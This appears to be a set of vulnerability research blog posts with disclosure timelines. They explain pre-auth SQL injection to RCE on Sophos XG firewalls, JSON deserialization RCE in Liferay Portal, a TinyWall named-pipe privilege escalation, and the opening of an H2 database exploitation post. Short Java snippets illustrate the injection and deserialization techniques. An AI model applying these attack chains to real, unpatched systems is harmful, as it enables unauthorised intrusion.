The criticality of the vulnerability prompted us to immediately warn our clients of the issue. As usual we provided lists of exposed and affected systems. Of course we also started an investigation into the technical details of the vulnerability. Due to the nature of the affected devices and the prospect of RCE, this vulnerability sounded like a perfect candidate for a perimeter breach in upcoming red team assessments. However, as we will explain later, this vulnerability will most likely not be as useful for this task as we first assumed.

Our analysis not only resulted in a working RCE exploit for the disclosed vulnerability (CVE-2020-12271) but also led to the discovery of another SQLi, which could have been used to gain code execution (CVE-2020-15504). The criticality of this new vulnerability is similar to the one used in the Asnarök campaign: exploitable pre-authentication either via an exposed user or admin portal. Sophos quickly reacted to our bug report, issued hotfixes for the supported firmware versions and released new firmware versions for v17.5 and v18.0 (see also the Sophos Community Advisory).


I am Groot

The lab environment setup will not be covered in full detail since it is pretty straightforward to deploy a virtual XG firewall. Appropriate firmware ISOs can be obtained from the official download portal. What is notable is the fact that the firmware allows administrators direct root shell access via the serial interface, the TelnetConsole.jsp in the web interface or the SSH server. Thus there was no need to escape from any restricted shells or to evade other protection measures in order to start the analysis.

Device Management -> Advanced Shell -> /bin/sh as root.

After getting familiar with the filesystem layout, exposed ports and running processes, we suddenly noticed a message in the XG control center informing us that a hotfix for the n-day vulnerability we were investigating had automatically been applied.

Control Center after the automatic installation of the hotfix (source).

We leveraged this behavior to create a file-system snapshot before and after the hotfix. Unfortunately diffing the web root folders in both snapshots (aiming for a quick win) resulted in only one changed file with no direct indication of a fixed SQL operation.

Architecture

In order to understand the hotfix, it was necessary to delve deep into the underlying software architecture. As the published information indicated that the issue could be triggered via the web interface we were especially interested in how incoming HTTP requests were processed by the appliance.

Both web interfaces (user and admin) are based on the same Java code served by a Jetty server behind an Apache server.

Jetty server on port 8009 serving /usr/share/webconsole.

Most interface interactions (like a login attempt) resulted in an HTTP POST request to the endpoint /webconsole/Controller. Such a request contained at least two parameters: mode and json. The former specified a number which was mapped internally to a function to be invoked. The latter specified the arguments for this function call.

Login request sent to /webconsole/Controller via XHR.
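To illustrate the shape of such a request, here is a minimal client sketch (only the endpoint and the two parameter names mode and json are taken from the observed traffic; the port, mode number and JSON body are placeholders):

import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

public class ControllerRequest {
    public static void main(String[] args) throws Exception {
        // Placeholder values -- the real mode number and JSON arguments depend on the invoked function
        String json = "{\"username\":\"admin\",\"password\":\"secret\",\"languageid\":\"1\"}";
        String body = "mode=151&json=" + URLEncoder.encode(json, "UTF-8");

        // Certificate validation against the appliance's self-signed certificate is omitted here
        HttpURLConnection con = (HttpURLConnection) new URL(
                "https://firewall:4444/webconsole/Controller").openConnection();
        con.setRequestMethod("POST");
        con.setDoOutput(true);
        con.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
        try (OutputStream os = con.getOutputStream()) {
            os.write(body.getBytes(StandardCharsets.UTF_8));
        }
        System.out.println("HTTP " + con.getResponseCode());
    }
}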

The corresponding Servlet checked if the requested function required authentication, performed some basic parameter validation (code was dependent on the called function) and transmitted a message to another component - CSC.

This message followed a custom format and was sent via either UDP or TCP to port 299 on the local machine (the firewall). The message contained a JSON object which was similar but not identical to the json parameter provided in the initial HTTP request.

JSON object sent to CSC on port 299.

The CSC component (/usr/bin/csc) appeared to be written in C and consisted of multiple sub modules (similar to a busybox binary). To our understanding this binary is a service manager for the firewall as it contained, started and controlled several other jobs. We encountered a similar architecture during our Fortinet research.

Multiple different processes spawned by the CSC binary.

CSC parsed the incoming JSON object and called the requested function with the provided parameters. These functions however, were implemented in Perl and were invoked via the Perl C language interface. In order to do so, the binary loaded and decrypted an XOR encrypted file (cscconf.bin) which contained various config files and Perl packages.

Another essential part of the architecture were the different PostgreSQL database instances which were used by the web interface, the CSC and the Perl logic, simultaneously.

The three PostgreSQL databases utilized by the appliance.
High level overview of the architecture.

Locating the Perl logic

As mentioned earlier, the Java component forwarded a modified version of the JSON parameter (found in the HTTP request) to the CSC binary. Therefore we started by having a closer look at this file. A disassembler helped us to detect the different sub modules which were distributed across several internal functions, but did not reveal any logic related to the login request. We did however find plenty of imports related to the Perl C language interface. This led us to the assumption that the relevant logic was stored in external Perl files, even though an intensive search on the filesystem had not returned anything useful. It turned out that the missing Perl code and various configuration files were stored in the encrypted tar.gz file (/_conf/cscconf.bin) which was decrypted and extracted during the initialization of CSC. The reason why we previously could not locate the decrypted files was that these could only be found in a separate Linux namespace.

As can be seen in the screenshot below, the binary created a mount point and called the unshare syscall with the flag parameter set to 0x20000. This constant translates to the CLONE_NEWNS flag, which disassociates the process from the initial mount namespace.

For those unfamiliar with Linux namespaces: in general, each process is associated with a namespace and can only see, and thus use, the resources associated with that namespace. By detaching itself from the initial namespace, the binary ensures that all files created after the unshare syscall are not propagated to other processes. Namespaces are a feature of the Linux kernel and container solutions like Docker rely heavily on them.

Calling unshare, to detach from the initial namespace, before extracting the config.

Therefore even within a root shell we were not able to access the extracted archive. Whilst multiple approaches exist to overcome this, the most appealing at that point was to simply patch the binary. This way, it was possible to copy the extracted config to a world-writable path. In hindsight, it would probably have been easier to just scp nsenter to the appliance.

Accessing the decrypted and extracted files by jumping into the namespace of the CSC binary.

From a handful of information to the N-Day (CVE-2020-12271)

The rolled out hotfix boiled down to the modification of one existing function (_send) and the introduction of two new functions (getPreAuthOperationList and addEventAndEntityInPayload) in the file /usr/share/webconsole/WEB-INF/classes/cyberoam/corporate/CSCClient.class.

The function getPreAuthOperationList defined all modes which can be called unauthenticated. The function addEventAndEntityInPayload checks if the mode specified in the request is contained in the preAuthOperationsList and removes the Entity and Event keys from the JSON object if that is the case.

Analysis

Based on the hotfix we assumed that the vulnerability must reside within one of the functions specified in the getPreAuthOperationList. However, after browsing through the relevant Perl code in order to find blocks that made use of the Entity or Event key, we were pretty confident that this was not the case.

What we did notice though is that regardless of which mode we specify, every request was processed by the apiInterface function. Sophos denoted the functions mapped to the mode parameter internally as opcodes.

The apiInterface function was also the place where we finally found the SQLi vulnerability aka execution of arbitrary SQL statements. As is depicted in the source excerpt below, this opcode called the executeDeleteQuery function (line 27) which took a SQL statement from the query parameter and ran it against the database.

Unfortunately, in order to reach the vulnerable code, our payload needed to pass every preceding CALL statement which enforced various conditions and properties on our JSON object.

The first call (validateRequestType) required that Entity was not set to securitypolicy and that the request type was ORM after the call.

The next call (variableInitialization) initialized the Perl environment and should always succeed. In order to keep our request simple and not to introduce additional requirements, the Entity value in our payload should not be one of the following: securityprofile, mtadataprotectionpolicy, dataprotectionpolicy, firewallgroup, securitypolicy, formtemplate or authprofile. This allowed us to skip the checks performed in the function opcodePreProcess.

The checkUserPermission function does what its name suggests. However, the function body shown below is only executed if the JSON object passed to Perl included a __username parameter. This parameter was added by the Java component before the request was forwarded to the CSC binary, if the HTTP request was associated with a valid user session. Since we used an unauthenticated mode in our payload, the __username parameter was not set and we could ignore the respective code.

To skip over the preMigration call we just had to choose a mode which was unequal to 35 (cancel_firmware_upload), 36 (multicast_sroutes_disable) or 1101 (unknown). On top of that all three modes required authentication making them unusable for our purposes, anyway.

Depending on the request type, the function createModeJSON employed a different logic to load the Perl module connected to the specified entity. Since each POST request initially started as an ORM request, we needed to be careful that the request type was not changed to something else. This was required to satisfy the last if statement before the vulnerable function was called inside the apiInterface function. Therefore the condition on line 15 must not be satisfied. The respective code checked if the request type specified in the loaded Perl module equaled ORM. We leave the identification of such an Entity as an exercise to the interested reader.

We skipped the call to the migrateToCurrVersion function since it was not important for our chain. The next call to createJson verified if the previously loaded Perl package could actually be initialized and would always work as long as it referred to an existing Entity.

The function handleDeleteRequest once again verified that the request type was ORM. After removing duplicate keys from our JSON, it ensured that our JSON payload contained a name key. The code then looped through all values which were specified in our name property and searched for foreign references in other database tables in order to delete these. Since we did not want to delete any existing data we simply set the name to a non-existing value.

We skipped the last two function calls to replyIfErrorAtValidation and getOldObject because they were not relevant to our chain and we had already walked through enough Perl code.

What did we learn so far?

  • We need a mode which can be called from an unauthenticated perspective.
  • We should not use certain Entities.
  • Our request needed to be of type $REQUEST_TYPE{ORMREQUEST}.
  • The request had to contain a name property which held some garbage value.
  • The EventProperties of the loaded Entity, and in particular the DELETE property, had to set the ORM value to true.
  • Our JSON object had to contain a query key which held the actual SQL statement we wanted to execute.

When we satisfied all of the above conditions we were able to execute arbitrary SQL statements. There was only one caveat: we could not use any quotes in our SQL statements since the csc binary properly escaped those (see the escapeRequest sub in the 0-day chapter for details). As a workaround we defined strings with the help of the concat and chr SQL functions.
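To give an idea of the workaround, a small helper that turns an arbitrary string literal into a quote-free Postgres expression (this is our own illustration, not code from the appliance):

public class QuoteFreeSql {
    // Builds e.g. concat(chr(97),chr(98),chr(99)) for "abc" -- no quote characters needed
    static String toSqlString(String s) {
        StringBuilder sb = new StringBuilder("concat(");
        for (int i = 0; i < s.length(); i++) {
            if (i > 0) sb.append(',');
            sb.append("chr(").append((int) s.charAt(i)).append(')');
        }
        return sb.append(')').toString();
    }

    public static void main(String[] args) {
        // Usable wherever a string literal would normally appear in the injected statement
        System.out.println(toSqlString("pgsql")); // concat(chr(112),chr(103),chr(115),chr(113),chr(108))
    }
}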

From SQLi to RCE

Once we had gained the ability to modify the database to our needs, there were quite a few places where the SQLi could be expanded into an RCE. This was the case because parameters contained within the database were passed to exec calls without sanitization in multiple instances. Here we will only focus on the attack path which, based on our understanding and the details released in Sophos' analysis, was used during the Asnarök campaign.

According to the published information, the attackers injected their payloads into the hostname field of the Sophos Firewall Manager (SFM) to achieve code execution. SFM is a separate appliance to centrally manage multiple appliances. This raised the question: what happens in the back end if you enable central administration?

To locate the database values related to the SFM functionality we dumped the database, enabled SFM in the front end, and created another dump. A diff of the dumps was then used to identify the changed values. This approach revealed the modification of multiple database rows. The attribute CCCAdminIP in the table tblclientservices was the one used by the attackers to inject their payload. A simple grep for CCCAdminIP directed us to the function get_SOA in the Perl code.

As can be seen on line 15, the code retrieves the value of CCCAdminIP from the database and passes it unfiltered into the EXECSH call on line 22. Due to some kind of cronjob, the get_SOA opcode is executed regularly, leading to the automatic execution of our payload.

What made this particular attack chain very unfortunate was the if condition on line 11, as it allowed us to reach the EXECSH call only if the automatic installation of hotfixes is active (which is the default setting) and if the appliance is configured to use SFM for central management (which is not the default setting). This resulted in a situation in which the attackers most likely only gained code execution on devices with activated auto-updates - leading to a race condition between the hotfix installation and the moment of exploitation.

Installations that do not have automatic hotfixes enabled or have not moved to the latest supported maintenance releases could still be vulnerable.

Gaining code execution via the SQLi described in CVE-2020-12271.

From N to Zero (CVE-2020-15504)

Another promising approach for discovery of the n-day, instead of starting at a patch diff, seemed to be an analysis of all back end functions (callable via the /webconsole/Controller endpoint) which did not require authentication. The respective function numbers could, for example, be extracted from the Java function getPreAuthOperationList.

SQL-Injection countermeasures inside the Perl logic

Despite the fact that the back end performed all its SQL operations without prepared statements, those were not automatically susceptible to injection.

The reason for this was that all function parameters coming in via port 299 were automatically escaped via the escapeRequest function before being processed.

So everything is safe?

One function which caught our attention was RELEASEQUARANTINEMAILFROMMAIL (NR 2531) as the corresponding logic silently bypassed the automatic escaping. This happened because the function treated one of the user-controllable parameters as a Base64 string and used this parameter, decoded, inside a SQL statement. As the global escaping took place before the function was actually called, it only ever saw the encoded string and thus missed any included special characters such as single quotes.

After the parameter was decoded, it was split into different variables. This was done by parsing the string based on the key=value syntax used in HTTP requests. We concentrated on the hdnFilePath variable, as its value did not need to satisfy any complicated conditions and ended up in the SQL statement later on.

The only constraint for $requestData{hdnFilePath} was that it did not contain the sequence ../ (which was irrelevant for our purposes anyway). After crafting a release parameter in the appropriate format we were now able to trigger a SQLi in the above SELECT statement. We had to be careful not to break the syntax, taking into account that the manipulated parameter was inserted six times into the query.

Triggering a database sleep through the discovered SQLi (6s delay as the sleep command was injected 6 times).
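To make the bypass of the global escaping more tangible, here is a small sketch that assembles such a Base64-wrapped key=value blob (the parameter name hdnFilePath is taken from the analysis above; the injected value and the second parameter are placeholders, not a working payload):

import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class ReleaseParameter {
    public static void main(String[] args) {
        // The single quote survives the escapeRequest logic because escaping runs
        // on the still Base64-encoded string, long before this blob is decoded.
        String inner = "hdnFilePath=x' <rest of the injection>--&hdnOther=1"; // placeholders only
        String release = Base64.getEncoder()
                               .encodeToString(inner.getBytes(StandardCharsets.UTF_8));
        System.out.println(release); // value sent as the Base64-encoded HTTP parameter
    }
}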

Upgrading the boring Select statement

The ability to trigger a sleep enables an attacker to use well known blind SQLi techniques to read out arbitrary database values. The underlying Postgres instance (iviewdb) differed from the one targeted in the n-day. As this database did not seem to store any values useful for further attacks, another approach was chosen.

With the code-execution technique used by Asnarök in mind, we aimed for the execution of an INSERT operation alongside a SELECT. In theory, this should be easily achievable by using stacked queries. After some experimentation, we were able to confirm that stacked queries were supported by the deployed Postgres version and the used database API. Yet, it was impossible to get it to work through the SQLi. After some frustration, we found out that the function iviewdb_query (/lib/libcscaid.so) called the escape_string (/usr/bin/csc) function before submitting the query. As this function escaped all semicolons in the SQL statement, the use of stacked queries was made impossible.

Giving up yet?

At this point, we were able to trigger an unauthenticated SQL Injection in a SELECT statement in the iviewdb database, which did not provide us with any meaningful starting points for an escalation to RCE. Not wanting to abandon the goal of achieving code execution we brainstormed for other approaches. Eventually we came up with the following idea - what if we modified our payload in such a way that the SQL statement returned values in the expected form? Could this allow us to trigger the subsequent Perl logic and eventually reach a point where a code execution took place? Constructing a payload which enabled us to return arbitrary values in the queried columns took some attempts but succeeded in the end.

Execution of a SELECT statement which returns values specified inside the payload.

After we had managed to construct such a payload we concentrated on the subsequent Perl logic. Looking at the source we found a promising EXEC call just after the database query. And one of the parameters for that call was derived from a variable under user control.

Unfortunately, the variable $g_ha_mode (most likely related to the high availability feature) was set to false in the default configuration. This prompted us to look for a better way. The function mergequarantine_manage did not contain any further exec calls but triggered two other Perl functions in the same file, under the right conditions. Those functions were triggered via the apiInterface opcode which generated a new CSC request on port 299.

In our case $request->{action} was always set to release restricting us to a call to manage_quarantine. This function used its submitted parameters (result-set from the query in mergequarantine_manage) to trigger another SELECT statement. When this statement returned matching values an EXEC call was triggered, which got one of the returned values as a parameter.

The question now was how the result-set of the second SELECT statement could be manipulated through the result-set of the first statement. How about returning values in the first query which would trigger a SQLi in the second statement? Because string concatenation was used to construct the statement, this should have been possible in theory. Unfortunately, even after having invested quite a bit of work to craft such a payload, we were unable to obtain the desired results. A brief analysis of how our payload was processed revealed that it was somehow escaped before reaching the second query. As it turned out, the reason for this was actually pretty obvious: as the function was triggered via a new CSC request, it automatically passed through the previously described escape logic.

Time to accept our defeat and be happy with the boring SQLi? Not quite...

Desperately looking for other ways to weaponize the injection we dug deeper into the involved components. At an earlier stage we already created a full dump of the iviewdb database but did not pay too much attention to it after having realized that it did not include any useful information. On revisiting the database, one of its features - so called user-defined functions - heavily used by the appliance, stood out.

User-defined functions enable the extension of the predefined database operations by defining your own SQL functions. Those can be written in Postgres' own language: PL/pgSQL. What made such functions interesting for our attack was, that previously defined functions could be called in-line in SELECT statements. The call-syntax is the same as for any other SQL function, i.e. SELECT my_function(param1, param2) FROM table;.

The idea at this point was, that one of the existing user-defined functions might allow the execution of stacked queries. This would be the case as soon as a parameter was used for a SQL statement without proper filtering inside a function. Walking over the database dump revealed multiple code blocks matching this characteristic and to our surprise an even simpler way to execute arbitrary statements - the function execute. The respective code expected only one parameter which was directly executed as SQL statement without any further checks.

This function would, in theory, allow us to execute an INSERT statement inside the SELECT query of mergequarantine_manage. This could be then used to add database rows to the table tblquarantinespammailmerge which should later end up in the exec call in manage_quarantine.

Triggering an INSERT statement via the execute function from within a SELECT statement.

After fiddling around for quite some time we were finally able to construct an appropriate payload (see below).

Explanation:

  • Line 1-2: Defining the two HTTP parameters needed for mode 2531.
  • Line 3-6: Defining the three Base64 encoded parameters, that are needed to pass the initial checks in mergequarantine_manage.
  • Line 7: Triggering the SQLi by injecting a single quote.
  • Line 8-11: Utilizing the user-defined function execute in order to trigger different SQL operations than the predefined SELECT.
  • Line 10: Adding a new row to the table tblquarantinespammailmerge that contains our code-execution payload in the field quarantinearea and sets messageid to 'a'. Note the .eml portion inside the payload, which is required to reach the exec call.
  • Line 9: Delete all rows from tblquarantinespammailmerge where the messageid equals 'a'. This ensures that the mentioned table contains our payload only once (remember that the vector is injected 6x in the initial statement). While this is not absolutely necessary, it simplifies the path taken after the SELECT statement in manage_quarantine and prevents our payload from being executed multiple times.
  • Line 12-14: Needed to comply with the syntax of the predefined statement.

Using the above payload resulted in the execution of the following Perl command:

So finally our job was done... but somehow there seemed to be no time delay, which would indicate that our sleep had not actually triggered. But why? Did we not use exactly the same execution mechanism as in the n-day? Turns out - not quite. Asnarök used EXECSH; we had EXEC. Unfortunately, EXEC treats spaces in arguments correctly by passing them as single values to the script.

I assume we better bury our heads in the sand

We had come too far to give up now, so we carried on. Finally we were able to execute code through the SQLi and it was good ol' Perl which allowed us to do so.

Adding this last piece to the attack chain and fixing a minor issue in the posted payload is left up to the reader.

Triggering a reverse shell by abusing the discovered vulnerability.

Timeline

  • 04.05.2020 - 22:48 UTC: Vulnerability reported to Sophos via BugCrowd.
  • 04.05.2020 - 23:56 UTC: First reaction from Sophos confirming the report receipt.
  • 05.05.2020 - 12:23 UTC: Message from Sophos that they were able to reproduce the issue and are working on a fix.
  • 05.05.2020: Roll out of a first automatic hotfix by Sophos.
  • 16.05.2020 - 23:55 UTC: Reported a possible bypass for the added security measures in the hotfix.
  • 21.05.2020: Second hotfix released by Sophos which disables the pre-auth email quarantine release feature.
  • June 2020: Release of firmware 18.0 MR1-1 which contains a built-in fix.
  • July 2020: Release of firmware 17.5 MR13 which contains a built-in fix.
  • 13.07.2020: Release of the blog post in accordance with the vendor after ensuring that the majority of devices either received the hotfix or the new firmware version.

We highly appreciate the quick response times, very friendly communication as well as the hotfix feature.

Liferay Portal JSON Web Service RCE Vulnerabilities

20 March 2020 at 12:31

Code White has found multiple critical rated JSON deserialization vulnerabilities affecting the Liferay Portal versions 6.1, 6.2, 7.0, 7.1, and 7.2. They allow unauthenticated remote code execution via the JSON web services API. Fixed Liferay Portal versions are 6.2 GA6, 7.0 GA7, 7.1 GA4, and 7.2 GA2.

The corresponding vulnerabilities are:

CST-7111: RCE via JSON deserialization (LPS-88051/LPE-16598 [1])
The JSONDeserializer of Flexjson allows the instantiation of arbitrary classes and the invocation of arbitrary setter methods.
CST-7205: Unauthenticated Remote code execution via JSONWS (LPS-97029/CVE-2020-7961)
The JSONWebServiceActionParametersMap of Liferay Portal allows the instantiation of arbitrary classes and invocation of arbitrary setter methods.

Both allow the instantiation of an arbitrary class via its parameter-less constructor and the invocation of setter methods similar to the JavaBeans convention. This allows unauthenticated remote code execution via various publicly known gadgets.

Liferay released the patched versions 6.2 GA6 (6.2.5), 7.0 GA7 (7.0.6) and 7.1 GA4 (7.1.3) to address the issues; the version 7.2 GA2 (7.2.1) was already released in November 2019. For 6.1, there is only a fixpack available.

Introduction

Liferay Portal is one of the most popular, if not the most popular, portal implementations per the Java Portlet Specification (JSR-168). It provides a comprehensive JSON web service API at '/api/jsonws' with examples for three different ways of invoking a web service method:

  1. Via the generic URL /api/jsonws/invoke where the service method and its arguments get transmitted via POST, either as a JSON object or via form-based parameters (the JavaScript Example)
  2. Via the service method specific URL like /api/jsonws/service-class-name/service-method-name where the arguments are passed via form-based POST parameters (the curl Example)
  3. Via the service method specific URL like /api/jsonws/service-class-name/service-method-name where the arguments are also passed in the URL like /api/jsonws/service-class-name/service-method-name/arg1/val1/arg2/val2/… (the URL Example)

Authentication and authorization checks are implemented within the invoked service methods themselves while the processing of the request and thus the JSON deserialization happens before. However, the JSON web service API can also be configured to deny unauthenticated access.

First, we will take a quick look at LPS-88051, a vulnerability/insecure feature in the JSON deserializer itself. Then we will walk through LPS-97029 that also utilizes a feature of the JSON deserializer but is a vulnerability in Liferay Portal itself.

CST-7111: Flexjson's JSONDeserializer

In Liferay Portal 6.1 and 6.2, the Flexjson library is used for serializing and deserializing data. It supports object binding that will use setter methods of the objects instantiated for any class with a parameter-less constructor. The specification of the class is made with the class key inside the JSON data itself, as illustrated below.
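A minimal sketch using Flexjson directly (the Target class stands in for an arbitrary attacker-chosen class; in a real attack a gadget class with dangerous setters would be named instead):

import flexjson.JSONDeserializer;

public class FlexjsonDemo {
    // Stand-in for an arbitrary attacker-chosen class reachable on the classpath
    public static class Target {
        public void setCommand(String command) {
            System.out.println("setCommand(" + command + ") was invoked");
        }
    }

    public static void main(String[] args) {
        // The "class" key makes Flexjson instantiate the named class via its
        // parameter-less constructor and call a setter for every remaining key.
        String json = "{\"class\":\"FlexjsonDemo$Target\",\"command\":\"calc.exe\"}";
        Object obj = new JSONDeserializer<>().deserialize(json);
        System.out.println(obj.getClass()); // class FlexjsonDemo$Target
    }
}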

This vulnerability was reported in December 2018 and has been fixed in the Enterprise Edition with 6.1 EE GA3 fixpack 71 and 6.2 EE GA2 fixpack 169 [2], and also in 6.2 GA6.

CST-7205: Jodd's JsonParser + Liferay Portal's JSONWebServiceActionParametersMap

In Liferay Portal 7, the Flexjson library is replaced by the Jodd Json library, which does not support specifying the class to deserialize within the JSON data itself. Instead, only the type of the root object can be specified and it has to be explicitly provided as a java.lang.Class object instance. Looking at the call hierarchy of write accesses to the rootType field unveils the following:

While most of the calls have hard-coded types specified, there is one that is variable (see the selected call on the right above). Tracing that parameterType variable through the call hierarchy backwards shows that it originates from a ClassLoader.loadClass(String) call with a parameter value originating from a JSONWebServiceActionParameters instance. That object holds the parameters passed in the web service call. The JSONWebServiceActionParameters object has an instance of a JSONWebServiceActionParametersMap that has a _parameterTypes field for mapping parameters to types. That map is used to look up the class for deserialization during preparation of the parameters for invoking the web service method in JSONWebServiceActionImpl._prepareParameters(Class<?>).

The _parameterTypes map gets filled by the JSONWebServiceActionParametersMap.put(String, Object) method:

Here the lines 102 to 110 are interesting: the typeName is taken from the key string passed in. So if a request parameter name contains a ':', the part after it specifies the parameter's type.
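For illustration (the parameter name and class are made up; only the colon syntax is taken from the code above), a form-encoded body parameter of the following shape causes the named class to be loaded and the JSON value to be deserialized into it:

import java.net.URLEncoder;

public class TypedParameter {
    public static void main(String[] args) throws Exception {
        // "<name>:<fully.qualified.Type>" -- the part after the colon ends up in
        // ClassLoader.loadClass() and Jodd binds the JSON value into that type,
        // invoking its setters along the way.
        String name  = "payload:com.example.SomeGadget"; // hypothetical gadget class
        String value = "{\"command\":\"calc\"}";         // setters called during binding
        String body  = URLEncoder.encode(name, "UTF-8") + "=" + URLEncoder.encode(value, "UTF-8");
        System.out.println(body); // sent via POST to /api/jsonws/<service>/<method>
    }
}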

This syntax is also mentioned in some of the examples in the Invoking JSON Web Services tutorial.

Later in JSONWebServiceActionImpl._prepareParameters(Class<?>), the ReflectUtil.isTypeOf(Class, Class) is used to check whether the specified type extends the type of the corresponding parameter of the method to be invoked. Since there are service methods with java.lang.Object parameters, any type can be specified.

This vulnerability was reported in June 2019 and has been fixed in 6.2 GA6, 7.0 GA7, 7.1 GA4, and 7.2 GA2 by using a whitelist of allowed classes.

Demo


  • [1] There are two editions of the Liferay Portal: the Community Edition (CE) and the Enterprise Edition (EE). The CE is free and its source code is available at GitHub. Both editions have their own project and issue tracker at issues.liferay.com: CE has LPS-* and EE has LPE-*. LPS-88051 was created confidentially by Code White for CE and LPE-16598 was created publicly three days later for EE.
  • [2] Fixpacks are only available for the Enterprise Edition (EE) and not for the Community Edition (CE).

CVE-2019-19470: Rumble in the Pipe

17 January 2020 at 09:18
This blog post describes an interesting privilege escalation from a local user to SYSTEM for a well-known local firewall solution called TinyWall in versions prior to 2.1.13. Besides a .NET deserialization flaw through Named Pipe communication, an authentication bypass is explained as well.

Introduction

TinyWall is a local firewall written in .NET. It consists of a single executable that runs once as SYSTEM and once in the user context to configure it. The server listens on a Named Pipe for messages that are transmitted in the form of serialized object streams using the well-known and beloved BinaryFormatter. However, there is an additional authentication check that we found interesting to examine and that we want to elaborate here a little more closely as it may also be used by other products to protect themselves from unauthorized access.

For the sake of simplicity the remaining article will use the terms Server for the receiving SYSTEM process and Client for the sending process within an authenticated user context, respectively. Keep in mind that the authenticated user does not need any special privileges (e.g. SeDebugPrivilege) to exploit the vulnerability described here.

Named Pipe Communication

Many (security) products use Named Pipes for inter-process communication (e.g. see Anti Virus products). One of the advantages of Named Pipes is that a Server process has access to additional information on the sender like the origin Process ID, Security Context etc. through Windows' authentication model. Access to Named Pipes from a programmatic perspective is provided through Windows API calls but can also be achieved e.g. via direct filesystem access. The Named Pipe filesystem (NPFS) is accessible via the Named Pipe's name with the prefix \\.\pipe\.

The screenshot below confirms that a Named Pipe "TinyWallController" exists and could be accessed and written into by any authenticated user.


Talking to SYSTEM

First of all, let's look at how the Named Pipe is created and used. When TinyWall starts, a PipeServerWorker method takes care of a proper Named Pipe setup. For this the Windows API provides System.IO.Pipes.NamedPipeServerStream with one of its constructors taking a parameter of System.IO.Pipes.PipeSecurity. This allows for fine-grained access control via System.IO.PipeAccessRule objects using SecurityIdentifiers and the like. Well, as one can observe from the first screenshot above, the only restriction seems to be that the Client process has to be executed in an authenticated user context, which doesn't seem to be a hard restriction after all.



But as it turned out (again take a look at the screenshot above) an AuthAsServer() method is implemented to do some further checking. What we want is to reach the ReadMsg() call, responsible for deserializing the content from the message received.



If the check fails, an InvalidOperationException with "Client authentication failed" is thrown. Following the code brought us to an "authentication check" based on Process IDs, namely checking if the MainModule.FileName of the Server and Client process match. The idea behind this implementation seems to be that the same trusted TinyWall binary should be used to send and receive well-defined messages over the Named Pipe.


Since the test for equality using the MainModule.FileName property could automatically be passed when the original binary is used in a debugging context, let's verify the untrusted deserialization with a debugger first.

Testing the deserialization

Thus, to test if the deserialization of a malicious object would be possible at all, the following approach was taken. Starting (not attaching to) the TinyWall binary from a debugger (dnSpy in this case) fulfills the requirement mentioned above, so setting a breakpoint right before the Client writes the message into the pipe allows us to change the serialized object accordingly. The System.IO.PipeStream.writeCore() method in the Windows System.Core.dll is one candidate in the process flow where a breakpoint could be set for this kind of modification. Therefore, starting the TinyWall binary in a debugging session in dnSpy and setting a breakpoint at this method immediately resulted in the breakpoint being hit.



Now, we created a malicious object with ysoserial.NET and James Forshaw's TypeConfuseDelegate gadget to pop a calc process. In the debugger, we use System.Convert.FromBase64String("...") as expression to replace the current value and also adjust the count accordingly.



Releasing the breakpoint resulted in a calc process running as SYSTEM. Since the deserialization took place before the explicit cast was triggered, it was already too late. If one doesn't like InvalidCastExceptions, the malicious object could also be put into a TinyWall PKSoft.Message object's Arguments member, an exercise left to the reader.

Faking the MainModule.FileName

After we have verified the deserialization flaw by debugging the client, let's see if we can get rid of the debugging requirement. So somehow the following restriction had to be bypassed:



The GetNamedPipeClientProcessId() method from Windows API retrieves the client process identifier for the specified Named Pipe. For a final proof-of-concept Exploit.exe our Client process somehow had to fake its MainModule.FileName property matching the TinyWall binary path. This property is retrieved from System.Diagnostics.ProcessModule's member System.Diagnostics.ModuleInfo.FileName which is set by a native call GetModuleFileNameEx() from psapi.dll. These calls are made in System.Diagnostics.NtProcessManager expressing the transition from .NET into the Windows Native API world. So we had to ask ourselves if it'd be possible to control this property.



As it turned out this property was retrieved from the Process Environment Block (PEB) which is under full control of the process owner. The PEB by design is writeable from userland. Using NtQueryInformationProcess to get a handle on the process' PEB in the first place is therefore possible. The _PEB struct is built of several entries as e.g. PRTL_USER_PROCESS_PARAMETERS ProcessParameters and a double linked list PPEB_LDR_DATA Ldr. Both could be used to overwrite the relevant Unicode Strings in memory. The first structure could be used to fake the ImagePathName and CommandLine entries but more interesting for us was the double linked list containing the FullDllName and BaseDllName. These are exactly the PEB entries which are read by the Windows API call of TinyWall's MainModule.FileName code. There is also a nice Phrack article from 2007 explaining the underlying data structures in great detail.

Fortunately, Ruben Boonen (@FuzzySec) had already done some research on this kind of topic and released several PowerShell scripts. One of these scripts is called Masquerade-PEB, which operates on the Process Environment Block (PEB) of a running process to fake the attributes mentioned above in memory. A slight modification of this script (also left to the reader) enabled us to fake the MainModule.FileName.


Even though the PowerShell implementation could have been ported to C#, we chose the lazy path and imported the System.Management.Automation.dll into our C# Exploit.exe. Creating a PowerShell instance, reading in the modified Masquerade-PEB.ps1 and invoking the code would hopefully result in faked PEB entries for our Exploit.exe.



Checking the result with a tool like Sysinternals Process Explorer confirmed our assumption, so the full exploit could now be implemented to pop some calc without any debugger.

Popping the calc

Implementing the full exploit was now straightforward. Our existing code, combining James Forshaw's TypeConfuseDelegate gadget with Ruben Boonen's PowerShell script invoked at the very beginning of our Exploit.exe, was extended to connect to the Named Pipe TinyWallController. The System.IO.Pipes.NamedPipeClientStream variable pipeClient was finally fed into BinaryFormatter.Serialize() together with the gadget popping the calc.



Thanks to Ruben Boonen's work and support of my colleague Markus Wulftange the final exploit was implemented quickly.

Responsible disclosure

The vulnerability details were sent to the TinyWall developers on 2019-11-27 and fixed in version 2.1.13 (available since 2019-12-31).


Exploiting H2 Database with native libraries and JNI

1 August 2019 at 12:54

Techniques to gain code execution in an H2 Database Engine are already well known but require H2 being able to compile Java code on the fly. This blog post will show a previously undisclosed way of exploiting H2 without the need of the Java compiler being available, a way that leads us through the native world just to return into the Java world using Java Native Interface (JNI).

Introduction

Last week, the blog post Jackson gadgets - Anatomy of a vulnerability by Andrea Brancaleoni of Doyensec was published. It describes how a setter-based vulnerability in the Jackson library can be exploited if the libraries of Logback and H2 Database Engine are available. In short, it exploits the feature of H2 to create user defined functions with Java code that get compiled on the fly using the Java compiler.

